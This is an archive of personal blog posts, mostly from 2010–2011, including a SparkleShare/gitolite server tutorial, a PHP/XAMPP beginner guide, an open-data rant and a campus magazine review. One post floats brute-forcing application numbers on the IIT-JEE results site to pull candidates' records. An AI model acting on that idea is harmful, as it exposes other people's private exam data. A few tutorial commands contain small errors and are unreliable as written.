And where is the Indian government at this? Not very far behind, but lagging nonetheless. Let us take the prime example of the decennial festival that is the Census. Apparently all census data is free (as it should be). But there is a minor caveat. The entire site is made in asp (which doesn’t really matter, I just don’t like it), and all the data (tables, figures, maps) are in pdf format. So, you can access the data personally, on a single page. Page by page, it might be thousands of documents, figures, charts, and what not. But since it is all in pdf format, it is locked down. You could parse it by some means, but the data is supposed to be free, in the best format possible so that everyone can use it easily. And the geographical boundary data(which I mentioned earlier) is also available in the census results, but only via a java applet, which does not allow access to the raw data, that an application developer would need. Am I expected to file an RTI application, just to know the exact boundaries of my state. Or perhaps, I should just pay ISRO and be done with it.

As an ~~additional benifit~~ easter egg, the census website states the following:

The Census of India or any data or content providers shall not be liable for any errors in the content, or for any actions taken in reliance thereon.

All efforts have been made to ensure the accuracy and currency of the content on this website. However, users are requested to verify/check any information with us to obtain appropriate professional advice before acting on the information provided in the website. In no event will the Government or office of the Registrar General India be liable for any expense, loss or damage including, without limitation, indirect or consequential loss or damage, or any expense, loss or damage whatsoever arising from use, or loss of use, of data, arising out of or in connection with the use of this website.

And lastly, as an analogue to the excellent Right To Information Act, there must be an analogous Right To Technology act. It should empower each and every person in the country to know what is happening behind the scenes. We demand total transparency in technological decisions. Not just the passing of tenders, but the decisions which involve actual technological development. For. eg at the CDAC website, the government offers a trial version of various forensic tools they’ve developed. Why aren’t they open sourced? Why were they writen using a particular language? If RTI fought off the beauracracy, this could help us eliminate the old technocrat thinking from the India Govt. If we are able to get the right data, in the right format, thousands of application developers across the world are willing to create great ways to access that data. Data by itself is not enough, however. It must be met with an equal resolve from people to make it accesible, and usable.

This could be a turning point in the Indian Govt. Either they could continue what they’ve been doing and meet their doom in a major state sponsored hack crippling the entire nation. Or they could take a step back, and do things the right way.

And what is the right way?

Update :According to an article in the Economic Times, there is a working draft for bringing Open-Source in e-governence systems under work.

Setting Up Sparkleshare Server using Gitolite and Ubuntu

2011-06-20T00:00:00+00:00

Introduction

Everybody seems to be all about open-source cloud-backup and sync solutions now-a-days. The hype is all around the cloud, they say. However cloud is just a stupid concept for sales people, that I prefer to avoid. However people are coming up with all kinds of crazy ideas to create their own dropbox clones. A few similar services include SpiderOak, Ubuntu One, Sugar Sync, and Wuala. However, not all of them are compatible with Linux (unlike Dropbox, which is).

Comparision

So here’s a minor comparision of some famous clients :

Dropbox : Cuurent Leader, offers everything from sync, collaboration, sharing, public links, upgradable storage and is the de-facto client for synchonization tasks. However there have been a few issues regarding its privacy issues recently.
Ubuntu One : Ubuntu One is Ubuntu’s fighting offering to Dropbox. Its excellent, with an open source api, that allows one to create applications for the Ubuntu One platform very easily. However, the server-side of Ubuntu-One is still closed source, which means you cannot setup it on your own servers (similar to dropbox). Canonical has hinted that it might be made open source in the future.
Wuala : is a file-backup network where you trade your own hard disk space for extra storage. This allows wuala to offer higher space at a much lower offering rate.
SpiderOak : I’m using this currently along with SparkleShare and Dropbox. It has proven to be very robust, allowing me to backup almost anything to its servers. I’ve got a 5GB account which is more than enough for me till now. Its very powerful interface allows one to control each and every aspect of your backup/sync/share process. Also it boasts of a true-privacy feature, meaning that all your documents are encrypted before being sent to dropbox. It also means that you can only reset your password from your own computer.

Take a look at http://en.wikipedia.org/wiki/Comparison_of_file_synchronization_software for a better comparision of several other services as well.

Installing SparkleShare using gitolite

This is a simple tutorial on running your own sparkleshare server as a hosting server. Note, that this implementation should ideally be built as a separate module for sparkleshare-admin, which is still under works as of writing. Sparkleshare’s basic concept is to use git repositories as storage places. In case you don’t know what git is, I’d recommend this guide for more details. In short it is an awesome revisioning system for use by anyone managing code(or content for that matter as well). It allows you to keep track of what is happening with your directory, and revert back to earlier versions (among several other things).

Sparkleshare asks you to setup a git-server somewhere and use it as a remote storage system. It offers out of the box support for git hosting providers github and gitorious. It also allows you to add your own custom servers as well. Enough description, lets get down to some work :

Setup Gitolite

Assumptions :

You are running a stable Linux OS (Fedore/Debian/Ubuntu etc)
user@host1 is your own computer
user2@host2 is the primary computer where you intend to start the server
The gitolite username is sparkle

#On your host machine (which will be remote admin to the git share)
ssh-copy-id user2@host2:/tmp/user.tmp
#should not ask for password:
ssh user2@host2
sudo apt-get install gitolite 
sudo dpkg-reconfigure sparkleshare
#Configuration Options may vary, but remember the gitolite user name that you specified
logout #Come back to your own computer
git clone sparkle@host2:gitolite-admin 
#Should work, or else you did something wrong. Go read the [gitolite docs](http://sitaramc.github.com/gitolite/doc/)
cd gitolite-admin
nano conf/gitolite.conf

Setup WildRepos

Edit the file and add the following lines at the bottom :

repo	share/[a-z0-9]{6}
	C	=   @all
	RW+	=   CREATOR

Now we need a method to allow anyone to create git repositories on the server. This is accomplished via Gitolite’s very powerful Wildcard Repositories feature.

#Login back to server
ssh user2@host2
#Since we are using package install method, sparkle's password needs to be set
sudo passwd sparkle
su - sparkle
nano .gitolite.rc
#search for $GL_WILDREPOS and set it to 1
logout
#Now we push our admin repo to add the wildrepo settings
#you're still inside the gitolite-admin directory, right
git push

Setup Client

Now, your server is all setup, but there is still stuff to be done :

#On user1@host1
mkdir -p ~/.ssh
sudo add-apt-repository ppa:warp10/sparkleshare
sudo apt-get update
sudo apt-get install sparkleshare libwebkit1.1-cil git-core
sparkleshare start &
sparkleshare stop

When you run sparkleshare for the first time, it asks you for a few things, including your email-id. Fill in those details, but do not setup your repository yet. You need to first allow your sparkleshare account access to gitolite.

cd ~/.config/sparkleshare
ls #Should reveal files called sparkleshare.email.key and sparkleshare.email.key.pub
cp sparkleshare.email.key.pub /path/to/gitolite-admin/keydir/
cd /path/to/gitolite-admin/
git commit -am "Added sparkleshare client1"
git push

Now if all goes well, you’d have allowed acess to gitolite for this user. We now need to re-run the sparkeshare setup again. Find it in your Applications. Now when it asks you to fill a repository path, type in the following details :

Server: sparkle@host2
Path: /share/fh73ah

Please take care of the slashes, otherwise sparkleshare fails to recognize it as a valid ssh address. Instead of fh73ah, you can type any alphanumeric string of 6 characters. You can change this in your gitolite-admin conf.

After your first sync is complete (in which it tries to clone your existing repo, and gitolite creates it for you), you can find a folder called Sparkleshare in your home directory. This contains all your personal sparkleshares, including your first one. Put in any content inside the fh73ah and it would be automatically synchronized.

Conclusion

The best thing about sparkleshare is that you can use your own server under your own rules. I’ve synced 143GB via Sparkleshare so far, and it has been working excellent so far. It takes a complete history, takes care of moves (git) and allows you to keeo huge backups easily. Just drag and drop, and forget. If you want to sync already existing folders, just drag them , and alt+drop them inside the shared folder. This way a sym-link gets created, which refers to the original directory. The sparkleshare folder on my computer takes up hardly a few kbs, but syncs worth 150gb.

This method is only useful if you need to manage multiple accounts on the same host. Otherwise, you can refer to this excellent post on webupd8 for instructions to install it to a single user system (which does not involve the complication of gitolite). I’ve been looking for some gitolite management scripts (I’ve written a few as well) which would allow one to easily add their own ssh keys. This way anyone can easily setup accounts on the system. However, as of now, this is just a dream.

New Website [ CaptNemo.in]

2011-06-13T00:00:00+00:00

Just if someone's still following this blog around(don't, its already dead). I've moved over to my new website (http://www.captnemo.in). Its running from github and will be a perfectly static website where the power of my awesome magical skills shall finally be revealed. Just joking. Its hosted on the awesome servers of github and you might want to check it out..

IIT-JEE 2011 Results

2011-06-01T00:00:00+00:00

I worked out the entire IIT-JEE 2011 results and the end result is available here. I’ve intentionally removed the Application Form Number (partially) in the results, so that it may not be misused. I’m thinking of trying a full-scale birthday permutation attempt on the JEE site for the Application Form. What do you think? Will it be worth it?

Learning Python, PyGTK

2011-05-16T00:00:00+00:00

I had been meaning to learn either Python or Ruby for a long time but had been unable to decide. I had a basic understanding of both of these, but I never had the chance to build an entire application in either. And I’m not talking about using Django or Ruby on Rails (which are both brilliant), but building a desktop application using GTK. The application I was first aiming for was a P2P sharing client which would be completely decentralized and offer several special features, such as :

NAT Transversal using UDP Hole Punching
HTTP based file sharing as well (so that people can install their clients, and still use IDM for downloading stuff)
Client discovery & routing behind firewalls along the lines of Skype (using supernodes)

However my dreams were shattered by the first point itself, being the difficulty of NAT Transversals. Further ahead was the question of networking as well, which could have potentially driven me nuts. I worked a bit on it, using STUN, twisted, but gave up on it soon as being unfeasable as a learning project.

The next idea came to me when I got tired of downloading stuff using axel from the command line and started itching for something similar to Internet Download Manger for Ubuntu. The closest thing to a download manager on Ubuntu is FatRat and is something I really don’t like. It is based on Qt and prouds on working as a front-end for several file-sharing websites as well. What I needed was in fact a fast download manager, which keeps tracks of what I download, and does not require keeping a terminal open all the time.

I found GwGet, which occassionaly looks much better in the source version than in the one from the Ubuntu Repositories. I really liked this one, except for the fact that it was made using C++, and used single threaded downloads (like wget). As a result it was quite slow, and not upto my needs.

That was when I thought of the idea of creating a download manger using [GTK][gtk] + Python/Ruby. I looked around for axel ports in Python/Ruby and found PyAxel, which beat axel in some of my benchmarks (after this patch). For the past two days, I have been working on PyGTK, Glade, Anjuta and several other IDEs, none of them to my liking. I really prefer Vim :)

So far, the work on PGet has been minimal. I’ve worked out threading, and little parts of GUI which were stripped from GwGet. As of now, it is still under works, but I am hoping for a release real soon. After all, it is not for nothing that they call Python a dynamic langugae

For more details, please go the PGet project page on Github. I will be posting further updates over there. In case someone is following this blog, you can view the source for this website at github and maybe even fork it!

Puzzles, Life & Other Things

2011-04-30T00:00:00+00:00

Since I’ve already decided to make this my newer blog, why not just continue in the same spirit and write a little of the events of my highly boring, lazy life. For one, I was part of the SDSLabs 1st yearly trip to Robber’s Caves which was highly enthralling. We enjoyed a lot, and as a bonus I learned to play Mafia. Somehow the concept of not-knowing and yet trying to deduce out a solution in Mafia seems quite interesting for a Party game to me. Among other things, my sister got me a new Rubik Cube (which should be my 6th or 7th I guess), and I’ve been practising quite a lot (to the dismay of my friends and teachers), My timings have not been upto the mark as they were last year, but I’ve been improving and I average around 80 seconds per solve. I’ve been focusing on learning the entire Fridrich, and try to learn 2-3 moves per day.

I also spent some time reading a brilliant new fantasy series called “The Kingkiller Chronicles” by Patrick Rothfuss. It is a brilliant new debut series in fantasy fiction, and already has 2 books out from its planned trilogy : The name of the Wind, and The Wise Man’s Fear. The series is highly praised, and you were to believe me, one of the best pieces of Fantasy ever written. But it is not the fantasy about this book that makes it so great. Its the general themes of love, tragedy, enemity, and knowledge that make it brilliant. Kvothe, the protagonist of the series is a charming character who is telling the story of his life to the Chronicler. Enough on the book, just go ahead and read it!

Oh, and I’ve got a RSS feed for blog using Jekyll already. Its available [here] (/atom.xml)

Game Of Thrones

2011-04-19T00:00:00+00:00

For the uninitiated, Game Of Thrones is a high budget fantasy TV series currently being screened on HBO. It is based on George R.R Martin’s epic fantasy, A Song Of Fire & Ice, book one of the Game Of Thrones series. I had started reading the book a few weeks ago (not knowing then about the TV series), but never quite got the time. However after the highly promoted Trailer, and the absolutely brilliant episode 1, I’ve picked up the book once again.

I’ve decided to keep myself aloof from all the spoilers, and read the book along with the series. This means that I will be finishing the book in a very long time, but also that I will be able to get a much better insight into what is going on the series. For eg there are very many characters in the TV series, which are not yet introduced, and it was interesting to see them come upfront in the book.

Is anyone else reading the book for the first time along with the TV series ?

Below is the ground from the book that each episode contains. I will continue to update this as the series goes ahead :

Episode :

Chapters 1-8
Chapters 9-17
Chapters 18-24*
Chapters 25-29
Chapters 30-35

* Only half of the chapter is present in the respective episode.

Let me know what you think of Game Of Thrones in the comments…

Introduction

2011-04-10T00:00:00+00:00

Welcome to my github pages. This will be my personal code blog site, or something of that sort. I will soon be transitioning this site to Jekyll for easier publishing and maybe move away from wordpress. (Done)

I am a proficient coder in PHP, working on various internal projects at SDSLabs.

Here is my current setup :

Dell Inspiron 1545
T-6400 Intel Core 2 Duo
Ubuntu Oneric Ocelot 11.10 (Default Primary OS)
~~Elementary OS (Under Testing)~~ Will be moving to Gnome Shell soon
~~Samurai WTF, Backtrack 5~~ for pen-tests
Moved from Windows after remaining a staunch supporter for 5 years

How to run apt-add-repository behind firewalls (#iitr)

2011-04-01T00:00:00+00:00

Copied from OMGUbuntu

Press Alt-F2 and type “gksu gedit /usr/lib/python2.6/dist-packages/softwareproperties/ppa.py”
Find line 88, change “keyserver.ubuntu.com” to “hkp://keyserver.ubuntu.com:80”
Save and close

Note that this is the default setting in Ubuntu Natty Narwhal (11.04), and was only applicable for Maverick or older versions.

Wona Oct-Dec '10 Review

2011-03-17T00:00:00+00:00

Download the issue on the WONA archive website.

Note about Archival: This post used to live on the (now-dead) piratecoders.co.cc website. I’ve moved it here for archival’s sake.

The latest issue of WONA turned up 3 months late at my doorstep. Other than the fact that it was missing an apology letter for this lateness, it was a good step in the forward direction by WONA in general. Once you take aside the pleasantries, and the sarcasm, I felt that WONA was, on a general scale, surpassing what it had been doing till now, and moving towards a better (and hopefully a quicker) issue. However, this one was definately not the one to be labelled perfect. So here comes the review :

Cover : Let’s start with the cover. Not much to write about it, other than the fact that it took me quite some time to figure out what was Maradone doing on it. Nice work in putting up the WONA logo (which I’m genuinely fond of). Nice choice of color scheme, and over-all good work.

Editorial : The magazine starts at a good note with the editorial promising us what’s inside in a nutshell. This was the best write-up of issue for me, and did its job well. I was enticed into reading further, and got a gist of what was about to come.

Almost Famous : Almost Famous has quite a history of its own, and is one column that every person who lays his hands on WONA definately reads. This time around, you held out Jan Flaming for me. As for the interview itself, it was clearly written, had some nice questions, some imaginary answers, and overall does quite well for the reader. On a second take, this was probably the reason it ends up on the first page this time.

Murphy’s Strip : Alas if Murphy had been here, he might have taken a shot or two at you. How about : “Any comic that can go wrong will go wrong.” Or maybe “If Vela could draw stupid sketches, he would.” Still, nice concept, bad execution. Could have been better, definately, especially with regards to sketching. Still 42 times better than the other strip.

NewsNotes : were 4 pages of news, which arrived 3 months too late. Nobody remembers any of these incidences happening, let alone being part of them. PAN-IIT was way bigger than your coverage, and deserved a bit more. Rest all the newsnotes were in a bit, exactly what they were supposed to be : News, without any sarcasm or humour. However I’m heavily against the use of one and half pages to glorify pages. I know how costly it is to push each page into the magazine, but please don’t fill it with something that no one bothers to read. Medal winners, please don’t mind but the two tables were a waste of space, if not something else. Or else the nine people from WONA’s news section could not find enough news. Anyone could have gotten these lists from the Sports Council a day after the event ceremonies. Give me something better.

Face-Off : was usual stuff. Nice choice of topic, nicely edited, with some actual points being thrown around, this turned out fine.

Big Story (Devil Wears Prada) : In spite of my initial skeptism about the story (I knew about it before the issue came out), I really liked it. This article goes ahead and proves that what you write on is unimportant (or at least less so) as long as you write it well. In a world of geeks, bringing out a cover story on fashion is really a bold move, and I must applaud you for having the guts to do so. The article was well written, and a joy to read. However I’d come to hear, from several sources, that people quoted in the article did not in fact give one to WONA. Please take care not to make up stuff next time. You’re a news mag, stick to the status quo, please.

Verbatim : WONA gets its hands on the most respected professor on on our campus, and does quite a good job of it as well. Nice questions, interesting answers make up a good read. In fact, the only negative point of the article was its placement.

WonaLeaks : This was the article that forced me to write this review. If it was an attempt at humour, it failed badly. As an attempt to mix news and wonaspeek, it fails even badly. Mixing kangaroos, indian cricket team, koala bears and a state prosecutor is definately not the recipe for sucess. It might work in movies (Spaceman + Potato Head + Zombie Dolls + Cowboy + Alien with 3 eyes = Oscar), but definately not on paper. Nobody remembers the event the article talks about. Its relation to wikileaks is not enough to demand a WonaLeaks icon. I shall forever remember this as the worst of writing, and imagination that ever came out of wona.

Tech-ila Shots : The in house tech article arrives a few months late. (Google just released Cr-48). I would have personally liked to see something else here (iPhone vs Android, iPhone 5, Ubuntu vs Windows etc). But as it was, the article was well thought of, and did exactly what it planned to. It could have done with a bit of pruning though, and the author might have liked to tell us a bit more about the OS itself (it only mentions the fact that its web based, comes as pre-installed, will not run intensive applications).

Random Ed : I’m not sure if it really is an editorial, but I’ll stick with the title. Nicely written in short. However the purpose and intent of such an article is lost in the true random nature of the article itself. The article fails to reach a resolution, and delievers nothing at all. Indeed most of the thoughts mentioned in the article, must have sprung to every person’s brain at some time or another. Then what’s the need of this article? Is it philosophy that Wona’s trying to dive into? Or perhaps its just a conspiracy to get all students in the campus to think more randomly, leading to a decrease in entropy of the thoughts of the profs, and as a consequence, simpler question papers. (For the skeptics, something similar has already happened, and our thought patterns are involed in the entropy of a system.)

Ethics : was actually the cover story (which one comes to know only after re-reading the cover). The author is unclear of the intent of the article, and it steers in various directions. I’m still unsure as to where it ends, and whether Arasu’s mumblings (Another Brick in the Wall) are part of it. One might raise question as to the relevance of the last section itself, but this article had its moments as well. In short, nice concept, nice writing, but could have done with a bit of restructuring.

Canine Strip : Another page wasted. The time spent by the sketcher could so easily have been devoted on bettering the other one. Needless to say, wona seems to be lacking in people who actually write, and the it results in a page filled with a stupid comic about dogs taking over the campus. Seriously, get some creativity. Even zombies would have done better.

WORC : Good decision in continuing this column. I was afraid it might get scrapped along with Agony Aunt(which was a very good decision). I can just hope that you actually asked some persons to create those pie charts. Dr. Sinhval seems to have taken his time in answering the questions, and his reply is full of facts, explanations, and ideas. Nice work by the ed team here, definitely.

Other than the articles there are a few more areas of interest I would like to point out.

Design: Seriously, have you people ever heard of vector graphics. Your designers really need a course on making scalable graphics. The need for Darth Vader to illustrate an article is fine, as long as you have a big enough image to fit. Trying to scale a 400×300 jpg into a page will not do. Even the cafe de norma ad was pixellated. The girl wearing Prada proves that it was possible to pring clearer graphics . However on the very next page, there’s an overdose of black. Similarly pixellated were most of the other pics on the mag. The 3 monkeys illustrating the second last page could have been something better. The essence of the German flag was lost in black & white(Almost Famous) . And just so you know that everyone noticed , dark colored pics in the background make text unreadable (Chrome OS).

Ads : I don’t know the reasons behind it, but from a reader’s point of view, an issue with only 3 ads is really awesome. Especially once you compare it with Kshitiz’s latest issue. I know it must have been really hard to cover the costs, and manage the finances and all that. But folks over here are smiling for your hard work. You finally published it (albeit 3 months late), and that’s what matters.

Placement : could have been better. Some articles should have gotton more coverage than given. Perhaps you should think of making Tech-ila bigger. I would’nt have minded the least if Verbatim had gotten a bit larger. The ethics article was divided into portions, I couldn’t understand, and might have done with fewer sections.

Cover : A little side note as to why the article change from the cover to the article itself. Isn’t the cover supposed to hold titles as well. On second thoughts, I might be wrong to suggest your current layout, but can you just put up page numbers! They would surely help.

And finally a note from my side : Wona is an excellent magazine. Despite it having a status quo of its own on its supposed unreadability without an excellent understanding of wona’s inner sanctum, I believe that the magazine is an essential part of life at iitr. It is one of the few sections in our campus, whose work is actually a part of our daily life. Thanks to the entire team for working so hard on this issue.

This review is my way of letting you know that there are people who care about what you write. There are people who wait for the issue, and who are determined to do so till they pass out. Consider it a friendly nudge and a little feedback from my side. Its up to you decide what your mag is after all. With hopes that the next issue is even better than this one

Update: Friends over at wona inform me that the delay in the mag was due to an issue on the administration’s side rather than wona’s side. If that was the case, the blame’s partially on your staff advisors (spelled incorrectly in the mag’s first page) : Dr. M.J. Nigam, and Dr. B.R.Gurjar. I’m still not sympathatic to the excuse given entirely, and believe that it might have come out a bit more sooner with some more effort on wona’s side.

Random Stray Thoughts

2010-05-25T00:00:00+00:00

[Editor’s note: I found this scrawled across a a4 sheet in a classroom. The author drifts off way too much from his thinking to make any sense, but there were some things that I really liked. So I present them to you, unedited, random, and unexplainable thoughts of a genius. My comments are in brackets]

Sometimes you are just destined to be where you are. You may try to veer off course, try to change it. But the end remains the same.

You.Here.Now

The forces of Destiny seem too powerful to be stopped by you. So you keep on flowing. Further & further away.

And time moves on And its Now already.

Looking back at the choices you made, the crossroads you stood. The coincidences, accidents pile up and as you remember them you think - would you have chosen otherwise?

But regardless of your answer you’d still be here, Now.

And its only left to deal with the Now.

[Note: Now the author takes a swipe at history. lol]

Ever since mankind learned to reason, the challenge had always been to tackle the Now. For tomorrow was forever being planned, partly in our own dreams, and partly in the garden of Destiny

As of the Past, it was just a multitude of feelings, a vault to choose from - Happy, sad, heartbreaking, exciting memories, remembrances, last words. The Past always walks besides us - sometimes haunting, crippling us down, and at times uplifting, encouraging, & maybe even expecting.

And so the challenge remains the the Now. What do you do with it? Go ahead and battle it head on - as you’ve been asked to, regardless of the consequences?

For herein lies the path to greatness, the say - Keep Fighting. But is it the only path?

[Note: Here on the author seems to get drifted far too much in his own thoughts, and does not care to explain very much. As a result much of the following is pretty self contradictory, and maybe even rubbish]

What if there is another road. A road much less taken as Frost said. A road you know nothing about.

What if the present is not a choice? What if it is just a sequence of events to be played out from someone’s memories, where you just play your part, and in-spite of what road you choose, you end up where you must.

So you fight. And think. And fight with the Present [As if the present is a monster, you fool], believing that the Future can be changed, it can be manipulated, morphed into someone’s likeness.

Your head starts to pound with the effort. You decide to stop thinking. [Ahh. Finally, I was wondering how long I would have to keep up]

Its clearing your head. Then you look around you. [Reality, anyone?] The Present closes in [Not again!!] You realize its not there to be defeated, or to win either. It just is. Just as you are. And you close your eyes again.

You start to think.

[I like the ending]

Worries Css Template

2010-04-15T00:00:00+00:00

Finally, from being a complete programmer to a designer as well, who can create a css template using Paint.Net. Photoshop is way too outlandish for me, you see. It wasn't easy, but it was definately fun. The template was based on a wallpaper by http://leon-gao.deviantart.com. The final template is still unnamed. Hope you all like it, and there is a demo available at http://nemo.criitique.in/worries . [caption id="attachment_55" align="alignleft" width="300" caption="Worries Template"][/caption]

What's Sailing

2010-03-23T00:00:00+00:00

Aboard The Nautilus, that is

I finally decided to write a blog post for my non geek friends with affiliations ranging from DPs to BPs and the oblivious to all, but the elite few, GPs (Keep thinking, non_IITians). In midst of all the chapos, and ghissai(not me, of course), Nautilus has been, and will remain a lonely submarine beneath the ocean. And this has been the way for me in the past month. After a hefty piece of time where we were attacked by the mighty INS Cognizance (actually it was a retariation attack, because you see, Nautilus had won an event of theirs, a treasure hunt, and the mighty Cognizance, and the event organizers deemed the methods of my winning to be dishonest. (I had my reasons). But after that a hefty war at the seas resumed. I, had the luxury to dip underneath and avoid everything, once in a while. But rumours surrounded me, and I started to hear all sorts of things about me. And that is when the drama settled once and for all.(It ended with a 5k fine, if you need to know).

INS Cognizance is on its way for the end of its journey(Join it @ www.cognizance.org.in and 26-30 Mar, IITR). However I shall be busy participating somewhere else, Chaos ‘10, India’s largest gaming extravaganza. I have assured INS Cognizance that Nautilus shall no longer be troubling them, but who knows with such waters, a collision may be unavoidable in the near future. And when that happens, I’m taking my warheads with me, just in case.

In other news, I have been working on a couple of my own ideas, such as SMAC-I (Search Music Across Channel I), a Video Portal for Cinematography Section, IITRAANA.org, Counter Strike servers, the Intra Bhawan Gaming Tourney (which we won easily enough in AoE, NFS, as well as CS). Congrats to my clan mates. The net connectivity has been terrible here, and I’ve been derailed a few times along my route to Gmail. Among other news, Oh, and I won the second prize in srishti’s dynamic website design, for LION- my twitter clone. I may or may not launch it, because you see, its just another clone. I also put up a new design for Criitique.in. Please check it out, and comment. I also posted a lot of pics and designs in Kriti , the DeviantArt clone for IITR. Check them as well.

For those outside IITR, the link for my web presence is http://nemo.criitique.in.

Here are some final few words in parting to all my frnds @ IITR

@[Ex!$TeN$n3] - gl hf, gg :)
@LxG - 14,11
@alpha_Q - Better Luck Next Time
@17ninJa - Practice For Chaos
@bOb - fnatic lost to na’vi 2-0 (16-14, 16-13 in train, infy !)
@roomie - [insert silence here]
@xerxes,forsaken - nice team
@DArK_LOrD - i expected better
@Dead_Man - Welcome to LxG
@ll those I frGT - [Proxy laga dena plz]

And special thanks to DR. Lecter, General Hendrix for making the legend of Capt. Nemo a reality. If you ever need assistance in a cross atlantic trip, let me know. I may ship you till atlantis, after which you are responsible for yourself and your belongings :)

Learning PHP/mySQL Part 1

2010-02-20T00:00:00+00:00

Over the past 2 months, I’ve been learning PHP/mySQL as a great language. After helping out a lot of people, I’ve decided to write a tutorial on using PHP/mySQL to create a cool website. For the entire duration of this tutorial, this is the list of softwares we will be working with:

XAMPP Server Lite version (to get apache & mySQL) Dreamweaver CS4 (For Template Support). Alternatively use Microsoft Expression Web 3. Notepad++ (Its a cool editor) PHP Manual (download the full html version)

The website we will be developing is called Artemis Fowl Files (AFF for short). It is a small website with several features that we shall develop over the length of the tutorial.

Installing PHP & mySQL using XAMPP

PHP is a server side scripting language. Which means that PHP is run on the web server itself. For example any PHP script running at Google.com will remain on the server, and not reach you (the client). By contrast, JavaScript runs on the client side, i.e. any JS code must be transmitted to the client before being executed.

This is how a basic PHP script actually runs:

PHP source File –> PHP Parser (running on the web server) –> Becomes an HTML file –> HTML File sent to Client

Which means that the PHP source file is run on the server, which converts the file to a pre-calculated html file, which is then sent to the client. Lets write some basic php coding.

 <HTML>
 <HEAD><TITLE>Sample PHP File</TITLE></HEAD>
 <BODY>
 <?php
 echo "This is a sample PHP File";
 ?>
 </BODY>
 </HTML>

The basic context of PHP is that the only code that is considered PHP is that covered between <?PHP and ?> blocks. Anything outside these is neglected and remains the same(i.e. it is not run on the server). The echo command sends the text string to the html file. All this means that the file received by the client will look like this:

 <HTML><HEAD><TITLE>Sample PHP File</TITLE></HEAD>
 <BODY>
 This is a sample PHP File
 </BODY>
 </HTML>

This is what you will get if you ran the script on a test server. But before doing that we must install XAMPP, and do some basic setup stuff.

Download, and Extract XAMPPlite.exe anywhere in your computer. Go to where you installed it and run setup_xampp.bat. This will automatically start the Apache Server, and the mysql Server by default. Also try tinkering with XAMPP-Control and see what runs it.

Now open your web browser (Firefox/Chrome is preferred) and open http://127.0.0.1. This IP address is a loopback IP address and always refers to this computer itself (yours). Now you should see a XAMPP splash screen. Go ahead and explore. As of now, what you’ve achieved is this : Installed Apache and the mySQL server. Now we need to change the settings for mysql. Open http://127.0.0.1/security/xamppsecurity.php and change the mysql root password(its blank by default). Also set a password on the xampp directory, so that others cant access these settings. Remember the mysql root password, for it will be useful later on.

Now comes the part where we actually sit down to write some code. We will be developing the mysql parts in the next segment. However we still need to do some other little things before we reach that part.

Creating The Dreamweaver Template

Now, call me lazy, but I don’t like designing themes, and CSS for my websites. I usually use a free one. And for the rest of this tutorial, I assume you will do the same. We need to create a Dreamweaver website using a readymade CSS Template. To get a template head on to http://www.freecsstemplates.org. I choose this template. Feel free to choose anything. It does not really matter which, but take care not to download a three column template, because what we will be developing is quite basic.

Create a directory called artemis inside htdocs folder(found inside xampp). Extract the css template files to the artemis folder such that the index.html file is inside xampp\artemis . Now head to your browser and open http://127.0.0.1/artemis.

If all went well, you should now see the template theme. Now we must convert this css template into a Dreamweaver template. Open the index.html file in Dreamweaver. We have to mark certain areas that we intend to edit in each document as editable. For instance the top header in each document must remain the same and would not be editable. But the sidebar content may need to change as per each page on our site. Taking this further the footer will be the same for each page. To create an editable region, just select a sample text from the main text (the one on that looks like the blog entry) and right click –>Templates->Create Editable Region.

Dreamweaver will give a warning that the current document will be converted to a template. That is what we want. Give a name to the region(lets call it ‘main’). Now delete everything other than this main region from the right column(ie the blog entry column. You may need to switch to the split view to cleanly delete the html markup.

Similarly create another editable region for the sidebar. Remember to delete everything else in the sidebar as well. Now there is something to Dreamweaver which requires you to create a “site” before you can create a template. So go to Site Menu and click on New Site. Choose a site name (Artemis) and enter the correct web address where you can access index.html (http://127.0.0.1/artemis or http://localhost/artemis). Tell Dreamweaver that you want to use a server technology (PHP mySQL). Choose edit and test locally(because we don’t yet have access to an external web server).

Once you’ve created a site, you can save the web template. (Ctrl S). Currently no templates exist in our web site, So we will create one and call it “main template”. If Dreamweaver asks you to update links, press yes.

Now we will create our basic home page using this template. Press Ctrl+N to create a new page. On the left choose “Page from Template”, Choose the site as Artemis, and the template as well. Press Create, and viola, we have our homepage. You may see that the heading, footer, and links are not changeable, because they’re not defined as “editable” in the template. However the regions you choose to be editable are marked as such. Try writing some basic text in the sidebar and in the main content screen, and then save the file as index.php.

Now open http://127.0.0.1/artemis/ in your computer, and be greeted with your newest creation. It’ is still, as of now, a static site, with links that don’t work and no dynamism, but we will make it better in the next part.

If you had trouble following this tutorial anywhere feel free to post comments, or tweet me @captn3m0. I will be happy to reply. Further if you feel that you missed something, here is my work for you to compare with:

//#todo add link to zip file here

Nautilus : Behind The Curtains

2009-12-04T00:00:00+00:00

Almost everyone looks at my laptop’s screen, and asks me “is that Windows 7 ?” and I reply each of them with the same answer “No”. I have not yet moved to 7, because of various reasons, which I am not going to explain over here, but lets just say that I’m still clinging to dear old Vista. I don’t really have much of a trouble with Vista as many people have said. I work blazingly fast with Vista, which is what it is all about. As an operating system, it is expected to help me get my job done, not do everything by itself”. And this is where my software listing comes into view. Since everyone have those “how the heck did you do that?” moments when they look at me doing stuff, I decided to publish a listing of some of my favourite applications that I use so that I may redirect you to safe spot where you may choose things as you like. This listing may not suite your way of working, however you might find a gem or two along the way. This is not a listing of all softwares that I use. Rather just a collection of cool tools that I think every Windows user must be using. If you think you’ve found that killer-app for doing things, do let me know in the comments. I’ll be listening.

**Dell Dock : **I just love this tools and its ability to divide the applications that I use into categories. It doesn’t take much of a screen estate, and takes me where ever I ask it to. With the ability to assign custom icons, and add separators/categories etc, it is more than an average dock, its my favourite dock. On the downside, this is only for Dell Computers, and comes preinstalled. However you can download it from here if you didn’t get it with your dell systems. Non dell users may be interested in RK Launcher, a freeware dock that simulates Mac Dashboard, and does a pretty good job. There was another version of Dell Dock (2.x which has yet to be released on the website, but was available to Dell Studio buyers, with new and better icons. Drop by a comment if you need it.
**Windows Sidebar : **Another tool I find myself using frequently is the Windows Sidebar, with 3-4 gadgets that are absolutely essential to me, such as the NowPlaying, MultiMeter, and the Top Processes gadget. A key shortcut to remember here is Win+Space which pops up my sidebar. Gadgets are a quick way to organize yourself, and keep a check on other things, like you schedule(Date Time), twitter(Twadged), quick launching apps, direct search among other things. Most users underestimate their usage and restrict themselves to the Clock and Slideshow gadget. Go ahead and search for them, see if you can find a gadget that matches what you’d like.
**Quick Launch : **Not many would regard this as a tool, however this gives one a productivity boost. Try putting your favourite tools in the Quick Launch, and see if that helps you a bit, between searching for that app in Start Menu, or clicking it right where its clickable. Also try increasing the size of the Quick Launch, by Unlocking the taskbar, right click->View->Large Icons. That really looks cool!
